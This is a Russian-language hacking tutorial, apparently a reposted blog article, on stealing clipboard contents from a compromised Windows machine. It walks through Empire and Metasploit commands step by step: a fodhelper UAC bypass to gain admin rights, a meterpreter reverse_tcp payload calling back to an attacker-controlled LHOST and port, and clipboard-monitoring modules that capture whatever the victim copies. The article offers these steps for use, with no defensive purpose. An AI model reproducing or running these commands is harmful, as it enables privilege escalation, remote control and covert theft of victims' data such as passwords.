Получение информации из буфера обмена Victim

Получение информации из буфера обмена Victim

Life-Hack

Всем привет! Сегодня столкнулся с такой ситуаций, когда нужно взять информацию из буфера обмена Victim. Разобрался и решил создать лайтовую статью для вас, думаю каждому пригодится в арсенале такая фича! Проводить атаку мы будем в kali linux 2017.3, а атаковать будем многострадальный windows server 2012 R2 standart.

Работу выполним в двух фрамеворках:

1. Metasploit со своим незаменимым meterpreter-ом

2. Empire

Что нам для этого понадобится ? Как всегда это получении сессии ( агента ), об этом много статей, поэтому я не буду описывать этот момент.

Ну приступим :

Получили мы агента в Empire. Идем в agents и смотрим, есть у нас права админа или нет. В моем случае они есть! Тому подтверждение * слева от названия машины

agents

Переименуем имя чтобы было удобнее с ним работать, далее подключаемся к агенту и проверяем в info чтобы строка high_integrity была заполнена 1, это так же подтверждает что мы имеет права админа.

rename (имя агента текущее) Codeby (новое имя агента)
interact Codeby
info

Видим что все отлично, можно работать ! Если мы получили агента с параметром high_integrity 0, то нужно сделать bypassuac. Пишем :

usemodule privesc/bypassuac +TAB
info
set Listener http(у меня листенер так называется)
run

И выбираем модуль. Советую выбрать bypassuac_fodhelper т.к. сам его узаю. В нем пишем info и обычно заполняем листенера которого создавали для получения агента. Собственно и запускаем run

Все после атаки получаем нового агента со * и подключаемся к нему :

interact (имя)

Ну теперь изи, пишем :

usemodule collection/clipboard_monitor
info

Собственно здесь мы видим такой параметр как PollInterval он нам говорит. Задайте количество секунд, через которое ему чекать изменения в буфере (по дефолту 15 сек). Я выставил 2 секунды, вы смотрите сами.. )

set PollInterval 2
run

Все, теперь после копирования информации у нас в империи появляется текст.

Prof1t

Теперь пришло время для метерпретера. Получили сессию и подключились к ней:

sessions (N) где N номер сессии

И опять же, если сессия получена с правами обычного юзера что мало вероятно, то проделать нужно следующие действия:

background
use exploit/windows/local/bypassuac_fodhelper
set SESSION N (где N номер сессии)
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.102 (свои данные)
set LPORT 5900 (свои данные)
run

Отлично, теперь подключимся и проверим права :

sessions N (где N номер сессии)
run post/windows/gather/win_privs

Супер, права админа есть, системы нет, можно работать. Далее подгружаем :

load extapi
help

Видим что данные успешно подгружены, можно работать.

clipboard_monitor_start - начать запоминать
clipboard_get_data - дампануть что есть
clipboard_monitor_stop - остановить

P.S. с правами системы это не работает ! Только с правами админа.

Также работа проведена на машине Windows 10 с помощью тех же инструментов, все отлично работает.

На этом у меня все) Всем профит и до новых встреч !) Источник

Report Page